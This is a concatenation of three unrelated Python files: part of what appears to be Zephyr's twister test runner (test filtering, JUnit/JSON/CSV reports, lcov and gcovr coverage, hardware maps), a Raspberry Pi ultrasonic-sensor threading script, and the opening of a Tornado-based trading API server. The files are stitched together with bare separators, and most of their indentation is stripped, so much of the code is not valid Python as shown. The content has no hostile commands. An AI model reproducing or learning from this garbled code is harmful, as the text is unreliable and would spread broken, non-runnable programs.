if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
                # run only quarantined tests to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
                for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
            # If integration mode is on, all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testcase.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
# Remove from discards configurations that must not be discarded (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False, report_skipped=True):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version, report_skipped=report_skipped)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA", report_skipped=True):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
eleTestsuite = None
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
else:
logger.info(f"Did not find any existing results for {p}")
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
if not eleTestsuite or not eleTestsuite.findall(f'testcase/[@name="{k}"]'):
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
if not report_skipped and total == skips:
continue
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if eleTestsuite:
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % (skips + int(eleTestsuite.attrib['skipped']))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if instance.status == 'skipped' and not report_skipped:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
                        # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
                    # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size", "run_id"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
try:
rowdict["run_id"] = instance.run_id
except AttributeError:
# No run_id available
rowdict["run_id"] = "na"
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
                ram_size = instance.metrics.get("ram_size", 0)
                rom_size = instance.metrics.get("rom_size", 0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["SKIP"] or instance.status == 'skipped':
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
elif instance.results[k] in ["PASS"] or instance.status == 'passed':
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
        Verify that each platform name (passed by the --platform option, or in a
        yaml file via the platform_allow or integration_platforms options) is
        known. If a platform is unrecognized, log an error and exit.
        """
        for platform in platform_names_to_verify:
            if platform not in self.platform_names:
                logger.error(f"{log_info} - unrecognized platform - {platform}")
                sys.exit(2)
def create_build_dir_links(self):
"""
        Iterate through all non-skipped instances in the suite and create a link
        for each instance's build directory. Those links will be passed to the
        CMake command in the next steps.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
        Create the build directory under its original "long" path, then create a
        link with a shorter path pointing at it and replace build_dir with that
        link. The link is what gets passed to the CMake command; this limits the
        path length, which can be significant when building with CMake on Windows.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
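    # For illustration (paths are hypothetical): a build directory such as
    #   <outdir>/qemu_x86/tests/kernel/common/kernel.common
    # gets a junction (Windows, via "mklink /J") or a symlink (Linux/macOS) named
    #   <outdir>/twister_links/test_0
    # and instance.build_dir is switched to that shorter path before CMake runs.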
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
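    # The parser above expects console output shaped roughly like this
    # (file name and hex payload are hypothetical):
    #   GCOV_COVERAGE_DUMP_START
    #   *path/to/file.gcda<a1b2c3d4...
    #   GCOV_COVERAGE_DUMP_END
    # i.e. each "*"-prefixed line maps one gcda file name to its hex-encoded
    # contents, split on "<".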
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
            # If kobject_hash is given for coverage, gcovr fails,
            # hence skip it; the problem exists only in gcovr v4.1.
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
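    # e.g. (illustrative values) _interleave_list("-e", ["foo", "bar"]) returns
    # ["-e", "foo", "-e", "bar"]; this is how the exclude and --add-tracefile
    # argument lists below are assembled.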
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
serial_baud=baud,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
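    # Illustrative hardware-map entry (all values hypothetical) using the keys read above:
    #   - platform: frdm_k64f
    #     id: "000123456789"
    #     runner: pyocd
    #     serial: /dev/ttyACM0
    #     baud: 115200
    #     product: "DAPLink CMSIS-DAP"
    #     fixtures: [fixture_i2c]
    #     pre_script: scripts/board_reset.sh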
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
threading_while_scanning.py
|
import RPi.GPIO as GPIO
import time
from threading import Thread
distances = []
TRIG = 24
ECHO = 26
GPIO.setmode(GPIO.BOARD)
GPIO.setup(TRIG, GPIO.OUT) # trigger voltage setup
GPIO.setup(ECHO, GPIO.IN) # echo input setup
GPIO.output(TRIG, False)
def scan_for_obstacles():
    # GPIO mode and pin directions are already configured at module level above.
    while True:
# tells the sensor to fire a burst of sound
GPIO.output(TRIG, True)
time.sleep(0.00001)
GPIO.output(TRIG, False)
while GPIO.input(ECHO) == 0:
pass
startTime = time.time()
while GPIO.input(ECHO) == 1:
pass
stopTime = time.time()
distance = (stopTime-startTime) * 17000
distances.append(distance)
time.sleep(0.025)
def move():
    # Guard against reading before the scanning thread has produced a value.
    if distances and distances[-1] <= 10:
        print('uh oh a-somebody toucha mah spagheett')
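# Minimal thread-safety sketch (not part of the original script): `distances` is
# appended to by the scanning thread and read by move(), so guarding both accesses
# with a Lock avoids reading while the list is being updated. `distances_lock` and
# `latest_distance` are illustrative names introduced here; for full protection the
# append inside scan_for_obstacles() would also need to run under the same lock.
from threading import Lock

distances_lock = Lock()

def latest_distance(default=None):
    # Return the most recent reading, or `default` if nothing has been measured yet.
    with distances_lock:
        return distances[-1] if distances else default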
def Main():
try:
t1 = Thread(target = scan_for_obstacles)
t1.start()
t2 = Thread(target=move)
t2.start()
t2.join()
        print(distances)
except KeyboardInterrupt:
# shut down cleanly
GPIO.cleanup()
if __name__ == '__main__':
Main()
|
api.py
|
# -*- coding: utf-8 -*-
import json
from decimal import Decimal, getcontext
import logging
import traceback
import calendar
import time
import tornado.ioloop
# from tornaduv import UVLoop
import sys
import Queue
import copy
import tornado.web
# import tornaduv
# import pyuv
import threading
# Create your views here.
from django.template import Context, loader
from crypton.http import HttpResponse
from crypton import settings
from django.utils.translation import ugettext as _
from django.utils import formats
from django.db import connection
from django.contrib.auth.models import User
from main.models import UserCustomSettings, VolatileConsts, OrdersMem, Accounts, TradePairs, Orders, Trans, Currency, \
Msg, add_trans, TransError, StockStat, OnlineUsers
from main.api_http_common import caching, cached_json_object, my_cache, status_false, json_auth_required, check_api_sign
from main.api_http_common import format_numbers10, format_numbers_strong, format_numbers, format_numbers4, \
json_false500, json_true
from datetime import datetime, timedelta
from main.account import get_account
logger_application = logging.getLogger('tornado.application')
from main.models import dictfetchall, to_prec, OrderTimer, add_trans2, DealsMemory
from main.msgs import system_notify
from main.my_cache_key import my_lock, LockBusyException, check_freq, my_release
from crypton.http import MemStore
from main.tornado.api_queue import process_delayed_operation
class TornadoServer(object):
    # static instance of this class; there is always exactly one
    # access it only through TornadoServer.get_instance()
_instance = None
@classmethod
def get_instance(cls):
"""
        Returns the server instance if it has been created.
        :rtype : TornadoServer
"""
if not cls._instance:
raise RuntimeError('core is not created')
return cls._instance
@classmethod
def is_created(cls):
"""
        Has the core been created?
:rtype : bool
"""
return cls._instance is not None
@classmethod
def create_instance(cls, *args):
"""
        Creates and returns the instance.
:rtype : Core
"""
        logger_application.info('creating tornado instance')
cls._instance = TornadoServer(*args)
logger_application.info('core created: {0}'.format(cls._instance))
return cls._instance
def __init__(self, *args):
self.port = args[0]
self.application = tornado.web.Application(args[1])
self.queue_enabled = args[2]
# self.core_event_loop = pyuv.Loop.default_loop()
self.memstore = MemStore.create_instance(is_local=False)
SizeQueue = 5000
SubscribeCountRead = 100
self.queue1 = Queue.Queue(SizeQueue)
self.task_archive = tornado.ioloop.PeriodicCallback( lambda: processed_orders2deals(), 1000*20)
self.task_memtrans2trans = tornado.ioloop.PeriodicCallback( lambda: process_queue(self.queue1, SubscribeCountRead, process_delayed_operation), 500)
# tornado.ioloop.IOLoop.configure(UVLoop)
# tornado.ioloop.IOLoop.current().initialize(self.core_event_loop)
# start eventloop, webserver and periodic reading
def start(self):
self.application.listen(self.port)
if self.queue_enabled:
self.task_archive.start()
self.task_memtrans2trans.start()
self.main_loop = tornado.ioloop.IOLoop.instance()
self.main_loop.start()
